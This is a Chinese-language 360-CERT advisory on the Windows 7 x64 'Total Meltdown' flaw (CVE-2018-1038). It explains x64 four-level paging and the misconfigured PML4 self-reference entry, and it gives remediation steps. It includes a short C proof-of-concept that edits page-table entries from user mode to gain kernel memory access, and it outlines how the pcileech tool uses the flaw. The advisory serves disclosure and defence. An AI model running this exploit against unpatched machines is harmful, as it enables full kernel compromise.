报告编号: B6-2018-033001

报告来源: 360-CERT

报告作者: 360-CERT,360安全卫士

更新日期: 2018-03-30

0x00 漏洞概述

近日,微软2018年1月和2月的Windows7 x64 和 Windows Server 2008 R2安全补丁中被发现存在严重漏洞(Total Meltdown),补丁中错误地将PML4权限设定成用户级,导致任意用户态进程可对系统内核进行任意读写。

360-CERT对此漏洞进行了相关的分析,建议相关受影响用户可以通过360安全卫士进行补丁升级。

0x01 漏洞影响面

漏洞危害等级:高危

漏洞编号:CVE-2018-1038

影响版本:

Windows 7 x64

Windows Server 2008 R2

0x02 x64分页原理

Intel X64使用的是四级分页模式:PML4(Page Map Level 4),PDPT(Page Directory Pointer),PD(Page Directory),PT(Page Table Entry)。

每张表有512个条目,所以理论上64位CPU可以寻址512*512*512*512*4KB=256TB的内存,但是由于48位物理地址的限制,实际上有效的虚拟地址属于下面这两个范围:0至7FFF’FFFFFFFF(512GB*256)或FFFF8000’00000000至FFFFFFFF’FFFFFFFF(512GB*256)。

微软采取了一种称为self-ref entry(自引用条目)的技术,在最高级别的页表中有一个条目指向自己。在64位系统中,任意自引用条目使用的物理地址应该指向PML4基地址的物理地址,与CR3寄存器所指向的地址相同。

0x03 漏洞细节

在Windows7 x64和Windows Server 2008 R2中,系统将PML4表中0x1ED这个固定位置存放指向自己的入口,对应的虚拟地址计算如下:

viraddr =0xFFFF000000000000+(0x1ed<<12)+(0x1ed<<21)+ (0x1ed<<30)+ (0x1ed<<39) =0xFFFFF6FB7DBED000

而安装完1月和2月安全更新后系统将虚拟地址0xFFFFF6FB7DBED000指向的内存权限错误地设置为用户态可读,漏洞原理如下。 四级分页结构: PML4、PDPT、PD、PT

由于PML4自引用的权限位为可读可写

所以利用自引用,黑客可以任意修改PML4、PDPT、PD、PT中的任意数据

正常虚拟地址到物理地址的映射:

PML4—–PDPT—–PD——-PT—-PAGE—–PAddr

利用自引用访问受保护的数据:

第一步修改页保护位(假设地址对应的PML4、PDPT、PD、PT对该用户来说都是可读可写,如果不,原理跟此一样),首先想办法获得与该页对应的PTE(利用自引用)地址:

方法: PML4—–PML4—-PDPT——PD—–PT——-PTE

修改保护位为可读可写。

第二步:直接修改数据(由于第一步已经修改权限位,所以不会引发异常)

证明代码如下:

#include #include #include #define QWORD unsigned long long #define BASE 0xFFFF000000000000 #define PML4 0xFFFFF6FB7DBED000 #define PML4SELF_IDX 0x1ed QWORD getAddr(QWORD base,QWORD pml4Idx,QWORD pdptIdx,QWORD pdIdx,QWORD ptIdx,QWORD offsetIdx); void testAddr(unsigned char *p); int main(int argc, char *argv) { unsigned char *p = (unsigned char*)getAddr(BASE, PML4SELF_IDX, PML4SELF_IDX, PML4SELF_IDX, 1, 0);//到达PDPT testAddr(p); QWORD *pte = (QWORD *)getAddr(BASE, PML4SELF_IDX, PML4SELF_IDX, PML4SELF_IDX, PML4SELF_IDX, 8); printf("%ulld\n", *pte); *pte = (*pte | 7); testAddr(p); return 0; } QWORD getAddr(QWORD base, QWORD pml4Idx, QWORD pdptIdx, QWORD pdIdx, QWORD ptIdx, QWORD offsetIdx) { return base = base + offsetIdx + (ptIdx<<12) + (pdIdx<<21) + (pdptIdx<<30) + (pml4Idx<<39); } void testAddr(unsigned char *p) { __try { int i = *p; printf("access 0x%p sucess\n", p); } __except (EXCEPTION_EXECUTE_HANDLER) { printf("access 0x%p error\n", p); } }

0x04 pcileech工具原理

漏洞作者根据漏洞原理将内存读取工具pcileech更新到了3.2版本使得其能够利用该漏洞。

通过在0x10000和0x2f000之间插入32页来设置页表结构。0x10000页面将作为PDPT。0x10000到0x2e000之间的另外31页将作为PD,其将映射2MB页的物理内存。使用当前算法这将允许映射最大31*512*2MB=31744MB的物理地址空间,大约30GB。

0x05 修复建议

1.使用360安全卫士扫描系统漏洞并修复

2.下载专用检测工具:http://down.360safe.com/totalmeltdown_fix.exe

0x06 时间线

2018-01-03  微软官方发布安全更新(KB4056897)

2018-02-13  微软官方发布安全更新(KB4074587)

2018-03-13  微软官方发布安全更新(KB4088878),360安全卫士推送相关补丁

2018-03-27  TotalMeltdown漏洞细节被公开

2018-03-30  360-CERT发布漏洞预警分析报告

2018-03-30  360安全卫士发布独立修复工具

0x07 参考链接

  1. https://blog.frizk.net/2018/03/total-meltdown.html

  2. https://www.coresecurity.com/blog/getting-physical-extreme-abuse-of-intel-based-paging-systems-part-1

  3. https://www.coresecurity.com/blog/getting-physical-extreme-abuse-of-intel-based-paging-systems-part-2-windows

  4. https://github.com/ufrisk/pcileech

声明:本文来自360CERT,版权归作者所有。文章内容仅代表作者独立观点,不代表士冗科技立场,转载目的在于传递更多信息。如有侵权,请联系 service@expshell.com。